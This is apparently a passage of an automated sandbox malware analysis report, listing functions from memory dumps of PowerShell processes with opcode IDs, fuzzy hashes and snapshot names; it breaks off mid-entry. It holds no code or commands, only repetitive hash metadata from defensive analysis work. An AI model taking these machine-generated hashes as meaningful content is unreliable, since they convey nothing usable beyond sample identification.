                                                                                          • Opcode ID: 4f7a17353b68489553223d368dee285704b1f10bc17a20f6c16e09731fb4d5ce
                                                                                          • Instruction ID: 3f05660b4b8c78c7ea9d77581808fe9126abb315c2c66c3bfa128913c2862633
                                                                                          • Opcode Fuzzy Hash: 4f7a17353b68489553223d368dee285704b1f10bc17a20f6c16e09731fb4d5ce
                                                                                          • Instruction Fuzzy Hash: F221283190CB4C4FDB59DB6C9C4A7E97FF0EB96321F04416BD048C3156D674A85ACB92
                                                                                          Function 00007FF848B343BC Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2486695211.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dc4ca4a00ea1c38a3dd78322585e5fa42ada9467fb160028299fed608e19d3fb
                                                                                          • Instruction ID: ccb24617486229c9ea54e4bb7fabc385fd0f66995c9d81927e0d7bde764363e6
                                                                                          • Opcode Fuzzy Hash: dc4ca4a00ea1c38a3dd78322585e5fa42ada9467fb160028299fed608e19d3fb
                                                                                          • Instruction Fuzzy Hash: 95110232D4E5464FE3A8EB6C98505B877D0EF506A0F4800BBD01DC7592DF18AC508389
                                                                                          Function 00007FF848A633B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction ID: de7a0f8eec8da211f247714961555455168b16d4566c1a6fb50d43c9fa48fced
                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction Fuzzy Hash: 3901843010CB084FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3655DA22E882CB46

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848A68BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.2485858551.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                                          • API String ID: 0-1415242001
                                                                                          • Opcode ID: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                                          • Instruction ID: 208d90183ab2ad6574fa171f6311cafc327ec61bf170aa5885bc8f3b70474fa1
                                                                                          • Opcode Fuzzy Hash: 43fc97dd348e09cb18fe9713d6d3d241ea91d68ddf1fc4c99a3e80af88e2cd8f
                                                                                          • Instruction Fuzzy Hash: 912107736085156AD2017A7DB8425FD7780DF943B834551F3E728DF113DF24A88B8A81

                                                                                          Executed Functions

                                                                                          Function 00007FF848A6644D Relevance: .7, Instructions: 696COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A65000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a65000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 12563a0aa5be03ccc084792a7fc6f4bf2df562b8f4e98fd8cd42efca11b7327f
                                                                                          • Instruction ID: 3fc00c5208da00f8efca59ab7db98426e329ce8ee0e787fd60f60a9f919a060b
                                                                                          • Opcode Fuzzy Hash: 12563a0aa5be03ccc084792a7fc6f4bf2df562b8f4e98fd8cd42efca11b7327f
                                                                                          • Instruction Fuzzy Hash: 1FD19030A0CA4D8FDF88EF68C455AA97BF1FF68340F14416AD449D729ACB74E881CB91
                                                                                          Function 00007FF848B366A6 Relevance: .4, Instructions: 356COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2646269781.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d1b9c369aadadb9e767e1aeb1b35a74d874996b89f59537e6cef731fa3fbc1b
                                                                                          • Instruction ID: 3648457db780c75eb6163b77e6e62700182ff17bb0834152f9b50f6be798bf90
                                                                                          • Opcode Fuzzy Hash: 0d1b9c369aadadb9e767e1aeb1b35a74d874996b89f59537e6cef731fa3fbc1b
                                                                                          • Instruction Fuzzy Hash: 8CB15731E1EA8A9FEB99AB6858145B97BE1FF0A390F4401BFD40DC7193EF18A805C355
                                                                                          Function 00007FF84894ED40 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2644157191.00007FF84894D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84894D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff84894d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d6a8025a5a073ae0d946f419e9403522bb5255000dc0eaeabaeedaac938d2b88
                                                                                          • Instruction ID: 7416d512dc644e1c4e76b5d4c6d96db8f0f8d64cae65180507f5983a8ac2a6e0
                                                                                          • Opcode Fuzzy Hash: d6a8025a5a073ae0d946f419e9403522bb5255000dc0eaeabaeedaac938d2b88
                                                                                          • Instruction Fuzzy Hash: 1341243081DBC44FE7569B2898459523FF0EF53261F1902DFD088CB5A3D629A84AC7A2
                                                                                          Function 00007FF848A69768 Relevance: .1, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A65000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a65000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d35d4d2c9f7a530fb451cfdf1e4b8b1e07e29cd0ab0488fd73458d66d36b0a0c
                                                                                          • Instruction ID: 261ff6a62b0bb3e023bc05a598ba8a07e940d2caf0f4903519d186338c2cfe86
                                                                                          • Opcode Fuzzy Hash: d35d4d2c9f7a530fb451cfdf1e4b8b1e07e29cd0ab0488fd73458d66d36b0a0c
                                                                                          • Instruction Fuzzy Hash: 0D31D83191CA489FDB1CDF5CA80A6B97BE0FB99711F04822FE449D3252CB60A855CBC2
                                                                                          Function 00007FF848A6A62C Relevance: .1, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A65000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a65000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c8109488f30ed31e45646b70065336e841f5cf9216140e16c575806efecd652d
                                                                                          • Instruction ID: 9718827f527be322d3620179b8f43371ce1eb799312f167bab73124fd9b81d65
                                                                                          • Opcode Fuzzy Hash: c8109488f30ed31e45646b70065336e841f5cf9216140e16c575806efecd652d
                                                                                          • Instruction Fuzzy Hash: 2E21283090CB8C4FDB59DF6C984A7E97FF0EB96321F04416BD048C3156DA74A456CBA2
                                                                                          Function 00007FF848A633B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a60000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction ID: de7a0f8eec8da211f247714961555455168b16d4566c1a6fb50d43c9fa48fced
                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                          • Instruction Fuzzy Hash: 3901843010CB084FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3655DA22E882CB46
                                                                                          Function 00007FF848B3414D Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2646269781.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5fc3c8b894114a092c6e7b8fa6d7bb873115ca2a23a8917229727548aad3bb84
                                                                                          • Instruction ID: a4fb7b18313c543c4009112fcd34c9f8bd0f9810608346c54d0d3e1804bf6d74
                                                                                          • Opcode Fuzzy Hash: 5fc3c8b894114a092c6e7b8fa6d7bb873115ca2a23a8917229727548aad3bb84
                                                                                          • Instruction Fuzzy Hash: 68F0BE32A0D9458FD65AEA4CE4008A977E0FF64360B1100BBE11DC75A3CB26EC408748
                                                                                          Function 00007FF848B34400 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2646269781.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 11f6c16bc8fd20e095da17fcb1544171025a27528a2e5208d6b22a98d683c203
                                                                                          • Instruction ID: 00a5bd4eb3a6791e95a150d2f6146b73a0245aeb165335b7bbf6a9548c3f1bd0
                                                                                          • Opcode Fuzzy Hash: 11f6c16bc8fd20e095da17fcb1544171025a27528a2e5208d6b22a98d683c203
                                                                                          • Instruction Fuzzy Hash: D0F0B832A0D5468FD798EA4CE0408A8B7E0FF44320B1100B7E10ACB4A3CB26EC508758
                                                                                          Function 00007FF848B341D1 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2646269781.00007FF848B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848b30000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                          • Instruction ID: 5d25082aaaf509f54ee139db43425ddef7ac102dad55c1953a1f208f1abc72c4
                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                          • Instruction Fuzzy Hash: 73E01A31B0CC089FDAA9EA4CE0409AA77E1FBA8361B1101B7D14EC7961CB32FC518B84
                                                                                          Function 00007FF848A6A2AA Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A65000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a65000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ee14ef26c1e667a27bb5f70a7236071cd7171e7dc6bc975a6a44866bcd8ea190
                                                                                          • Instruction ID: ba5d3da06921e39be36416b42ef67ad6a48a3d9f543196ffa6ab3e5cc933ccc1
                                                                                          • Opcode Fuzzy Hash: ee14ef26c1e667a27bb5f70a7236071cd7171e7dc6bc975a6a44866bcd8ea190
                                                                                          • Instruction Fuzzy Hash: B1E04F75808A4C8FDB48EF28D85A9E97BE0FF68305F00029BE80DC7120DB719958CBC2

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848A68BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2645322863.00007FF848A65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A65000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_7ff848a65000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                          • API String ID: 0-3225005683
                                                                                          • Opcode ID: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                                          • Instruction ID: 34ce7b7389a86e6ee99e33f08c2bba0472ee95b085bd0570472b45a4bffba72a
                                                                                          • Opcode Fuzzy Hash: db0c1d812fb334ef627ac546dd3fad6e1f4be7f409516e181b75d3ed5e758025
                                                                                          • Instruction Fuzzy Hash: A521F3B760D5256EE302BFBDF8055FD3740CF942B474552B3D2A88B053EA14748A8AE1

                                                                                          Executed Functions

                                                                                          Function 00007FF848A7644D Relevance: .7, Instructions: 696COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6e9558e454785889b7235f46e8ea74cd3ea74ce111352d5ce7146aff4807a9be
                                                                                          • Instruction ID: 8425ba2ee6e66d69fac639c73cff5741a17321ab7b618edac21567eb42acc62c
                                                                                          • Opcode Fuzzy Hash: 6e9558e454785889b7235f46e8ea74cd3ea74ce111352d5ce7146aff4807a9be
                                                                                          • Instruction Fuzzy Hash: E5D16D30A19A4D8FDF88EF58C495BA97BF1FF68340F18416AD409D7296CB74E881CB91
                                                                                          Function 00007FF848B4660A Relevance: .4, Instructions: 417COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2869733146.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848b40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 039eae537cbc39d9c02dfd6ea41a22ef42acb3c879537756fec0e5fb76b788ea
                                                                                          • Instruction ID: 343abc80cf6891119483eab8360705b2b7d97719a0288296cf7a2c33844ee3ce
                                                                                          • Opcode Fuzzy Hash: 039eae537cbc39d9c02dfd6ea41a22ef42acb3c879537756fec0e5fb76b788ea
                                                                                          • Instruction Fuzzy Hash: CFC17631D1EA8A5FF799AB2868166B97BE0FF16B90F0401BED40CC7093EB18AC04C755
                                                                                          Function 00007FF848A79CF8 Relevance: .3, Instructions: 276COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b2765f97044f65e3a66e9fee015b65f835c044698482ffc8f43f05dcd8c6f1b6
                                                                                          • Instruction ID: 195c1f824317f5a8fb8be2abe99aebb1ec55a6e639628affff6fe77008c2b367
                                                                                          • Opcode Fuzzy Hash: b2765f97044f65e3a66e9fee015b65f835c044698482ffc8f43f05dcd8c6f1b6
                                                                                          • Instruction Fuzzy Hash: F231C37580E7C58FEB47DB3858162A4BFA0EF17250F0801EBD488CB0A3D669D959C7A6
                                                                                          Function 00007FF848A7A0D3 Relevance: .3, Instructions: 272COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 661477489174e7c21df09de71d78792f0c223df666679bffcb454770732d9374
                                                                                          • Instruction ID: f14b4e691f6ce89752997afb41e9c48394a75a54512fd3184fc06b03984dfb4d
                                                                                          • Opcode Fuzzy Hash: 661477489174e7c21df09de71d78792f0c223df666679bffcb454770732d9374
                                                                                          • Instruction Fuzzy Hash: 5421502680F7C95FE743EB38A86A0E47FB0EF53154B1901E7D498CB0A3D9199849C767
                                                                                          Function 00007FF848B46633 Relevance: .3, Instructions: 260COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2869733146.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848b40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 84cdd489c758649e63e6c4c6a6bea441af56b21f851cbc0e980eca879078c4f6
                                                                                          • Instruction ID: 05f964551729f7d765f493f632a819c97b36eba31c8bdf6b42b0b218821dc17e
                                                                                          • Opcode Fuzzy Hash: 84cdd489c758649e63e6c4c6a6bea441af56b21f851cbc0e980eca879078c4f6
                                                                                          • Instruction Fuzzy Hash: 9E811221D1EB8A5FF7AAAB2854626747BE1EF16B80F5800FEC44DCB5D3DA189C088715
                                                                                          Function 00007FF848A796E2 Relevance: .2, Instructions: 202COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 18b02d0eb62fb06523d39af0b9c734e702316596ebff6dc817e5cbd4bb5d7df1
                                                                                          • Instruction ID: d181204af9e1996698f1d41030fe183684cb1f1152cd1790161481387bd2ab7e
                                                                                          • Opcode Fuzzy Hash: 18b02d0eb62fb06523d39af0b9c734e702316596ebff6dc817e5cbd4bb5d7df1
                                                                                          • Instruction Fuzzy Hash: 4D511D7190DAC55FE70ADB28581A6B87FE0FF56710F0802BFD04887193DB68A9468797
                                                                                          Function 00007FF848B44073 Relevance: .2, Instructions: 182COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2869733146.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848b40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 468c22d7391e2fd70b5ec0ac6cddad1df4522983ef5dd8bbbf542cc7d50e5471
                                                                                          • Instruction ID: 71b2cfbfd897c67b3c145aab1edc211e0fd426a8cef5bf52efee6031490a5d28
                                                                                          • Opcode Fuzzy Hash: 468c22d7391e2fd70b5ec0ac6cddad1df4522983ef5dd8bbbf542cc7d50e5471
                                                                                          • Instruction Fuzzy Hash: 96512A32E0EA4A4FE799EA2C54126757BE2FF55A64F1801BAC00EC7693DF24EC258345
                                                                                          Function 00007FF84895E540 Relevance: .1, Instructions: 124COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2867020581.00007FF84895D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84895D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff84895d000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb8f161c95ff85dc4200bd0d9d233e2024c5e6a97fe4c990292f5cdc78a8a4e7
                                                                                          • Instruction ID: 9cb845dfdc7a98cfed1f464192b0956d1a97c16a220a32c91825509006926cda
                                                                                          • Opcode Fuzzy Hash: bb8f161c95ff85dc4200bd0d9d233e2024c5e6a97fe4c990292f5cdc78a8a4e7
                                                                                          • Instruction Fuzzy Hash: 9541F37180DBC44FE7569B3898459563FF0EF52361F1506DFD088CB1A3E626A84AC792
                                                                                          Function 00007FF848A7A64C Relevance: .1, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: da388c637f1f66f75f17f877070970240e2bf2ca75c1cacd4a60a6568d6e60b6
                                                                                          • Instruction ID: c8baf67faf5afecf18dd9b7be78db4fc1893c2d143ebf123c471ed57a5351119
                                                                                          • Opcode Fuzzy Hash: da388c637f1f66f75f17f877070970240e2bf2ca75c1cacd4a60a6568d6e60b6
                                                                                          • Instruction Fuzzy Hash: 2F21F83190CB4C8FEB59DF6C984A7E97FF0EB96321F04416BD048C3156DA74A85ACB92
                                                                                          Function 00007FF848B440BF Relevance: .1, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2869733146.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848b40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c4319bddedd3b38ac90f62f5af583b61e9ab545d7e0b1d21e73efd5b8928e1b1
                                                                                          • Instruction ID: 2cc34036086c91a608324d026cf7550ceb2a484c563d3dde0e2c853089662230
                                                                                          • Opcode Fuzzy Hash: c4319bddedd3b38ac90f62f5af583b61e9ab545d7e0b1d21e73efd5b8928e1b1
                                                                                          • Instruction Fuzzy Hash: 47210932E0EA4B4FE799EA1C54521766AD1FF54794F5901B9C01EC79E3CF18EC248305
                                                                                          Function 00007FF848A733B5 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction ID: 71cefdd49431f79323322c0a93ab1020a049d1b6accb41f3d2ece4370f5e4985
                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                          • Instruction Fuzzy Hash: F101843110CB084FDB44EF0CE051AA5B7E0FB85364F10052DE58AC3691DA22E882CB46
                                                                                          Function 00007FF848B44400 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2869733146.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848b40000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 337b7d0a95ab0eab1608f3acd32acb2acc4313d3a203aae475e24b2eada5789d
                                                                                          • Instruction ID: 7c3f134bc4cb397a6a645c28a247a958a129cf4067091457555d635de1785639
                                                                                          • Opcode Fuzzy Hash: 337b7d0a95ab0eab1608f3acd32acb2acc4313d3a203aae475e24b2eada5789d
                                                                                          • Instruction Fuzzy Hash: B8F0B832A0E5468FD758EA1CE0428A8B7E0FF44724B1100B6E109CB8A3CB26AC608754

                                                                                          Non-executed Functions

                                                                                          Function 00007FF848A78BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.2868328313.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_7ff848a70000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                          • API String ID: 0-2350917820
                                                                                          • Opcode ID: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                                          • Instruction ID: d6eceb240fbdcec492aa3c41923ac979300521f5da0bb0259251ee2bbad9d742
                                                                                          • Opcode Fuzzy Hash: 227aa69b1fbc1c82fa311b63e9fce6667358cd8e78cee4ad2729eeab0005292d
                                                                                          • Instruction Fuzzy Hash: E421F673A085157ADA02BA7DF8425FC7791DF543B834902F3E528DF113DD18A98B8681

                                                                                          Executed Functions

                                                                                          Function 00007FF848A71719 Relevance: .7, Instructions: 696COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3a35cc3bbabd7397f2a19eacac939e704dc261b9c479c0f26d379201c7a4c85
                                                                                          • Instruction ID: a4e64b5d0ed9073c67b601532b020698ffa7d3301e2d4452984c930e2f7c0fed
                                                                                          • Opcode Fuzzy Hash: a3a35cc3bbabd7397f2a19eacac939e704dc261b9c479c0f26d379201c7a4c85
                                                                                          • Instruction Fuzzy Hash: D022C160B2DA595FE798FB38945A2B976D2FF88780F440579D00EC32C6DE68AC019792
                                                                                          Function 00007FF848A720F1 Relevance: .2, Instructions: 211COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000011.00000002.2944812682.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_17_2_7ff848a70000_coding.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
